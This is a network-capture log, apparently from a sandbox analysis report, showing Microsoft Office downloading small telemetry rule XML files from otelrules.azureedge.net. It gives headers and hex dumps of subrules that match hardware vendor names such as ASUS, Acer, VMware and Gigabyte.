                                                25192.168.2.45807113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:49 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:49 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:49 GMT
                                                Content-Type: text/xml
                                                Content-Length: 467
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                ETag: "0x8DC582BA6C038BC"
                                                x-ms-request-id: e84b733d-701e-005c-1bb8-26bb94000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232249Z-16849878b78zqkvcwgr6h55x9n00000006kg00000000s0h1
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:49 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26192.168.2.45807213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:50 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:50 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:50 GMT
                                                Content-Type: text/xml
                                                Content-Length: 407
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                ETag: "0x8DC582BBAD04B7B"
                                                x-ms-request-id: f66eff46-601e-0084-3c9d-276b3f000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232250Z-15b8d89586fnsf5zkvx8tfb0zc00000002ag00000000b79v
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:50 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                27192.168.2.45807313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:50 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:50 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:50 GMT
                                                Content-Type: text/xml
                                                Content-Length: 486
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                ETag: "0x8DC582BB344914B"
                                                x-ms-request-id: 0fe0dd21-c01e-0066-771c-26a1ec000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232250Z-16849878b78z2wx67pvzz63kdg00000005q0000000011w5x
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:50 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                28192.168.2.45807413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:50 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:50 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:50 GMT
                                                Content-Type: text/xml
                                                Content-Length: 427
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                ETag: "0x8DC582BA310DA18"
                                                x-ms-request-id: 6b0d144c-801e-007b-3a49-27e7ab000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232250Z-16849878b78p8hrf1se7fucxk8000000081000000000mgfu
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:50 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                29192.168.2.45807513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:50 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:50 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:50 GMT
                                                Content-Type: text/xml
                                                Content-Length: 486
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                ETag: "0x8DC582B9018290B"
                                                x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232250Z-16849878b78km6fmmkbenhx76n00000006gg00000000ms9w
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:50 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                30192.168.2.45807613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:50 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:50 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:50 GMT
                                                Content-Type: text/xml
                                                Content-Length: 407
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                ETag: "0x8DC582B9698189B"
                                                x-ms-request-id: e4cbed29-601e-0002-4328-26a786000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232250Z-17c5cb586f6hhlf5mrwgq3erx800000008n0000000009nnv
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:50 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                31192.168.2.45807713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:50 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:51 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:50 GMT
                                                Content-Type: text/xml
                                                Content-Length: 469
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                ETag: "0x8DC582BBA701121"
                                                x-ms-request-id: 8526d813-501e-000a-4be6-290180000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232250Z-17c5cb586f6b6kj91vqtm6kxaw00000005x000000000bhn2
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:51 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                32192.168.2.45807813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:50 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:51 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:50 GMT
                                                Content-Type: text/xml
                                                Content-Length: 415
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                ETag: "0x8DC582BA41997E3"
                                                x-ms-request-id: 6484a1a6-201e-0000-75a3-26a537000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232250Z-16849878b787bfsh7zgp804my4000000061g00000000774d
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:51 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                33192.168.2.45807913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:50 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:51 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:51 GMT
                                                Content-Type: text/xml
                                                Content-Length: 477
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                ETag: "0x8DC582BB8CEAC16"
                                                x-ms-request-id: d5e28e91-a01e-0021-638f-27814c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232251Z-r197bdfb6b4grkz4xgvkar0zcs00000006z000000000261m
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:51 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                34192.168.2.45808013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:50 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:51 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:51 GMT
                                                Content-Type: text/xml
                                                Content-Length: 464
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                ETag: "0x8DC582B97FB6C3C"
                                                x-ms-request-id: 1a39e609-901e-0048-60a3-26b800000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232251Z-16849878b78p8hrf1se7fucxk800000008600000000005d5
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:51 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                35192.168.2.45808113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:51 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:51 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:51 GMT
                                                Content-Type: text/xml
                                                Content-Length: 494
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                ETag: "0x8DC582BB7010D66"
                                                x-ms-request-id: e7bd3bd0-f01e-003c-42e3-258cf0000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232251Z-15b8d89586fdmfsg1u7xrpfws00000000bb000000000h5y2
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:51 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                36192.168.2.45808313.107.246.604438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:51 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:51 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:51 GMT
                                                Content-Type: text/xml
                                                Content-Length: 472
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                ETag: "0x8DC582B9DACDF62"
                                                x-ms-request-id: 2faa3f77-001e-008d-269c-27d91e000000
                                                x-ms-version: 2018-03-28
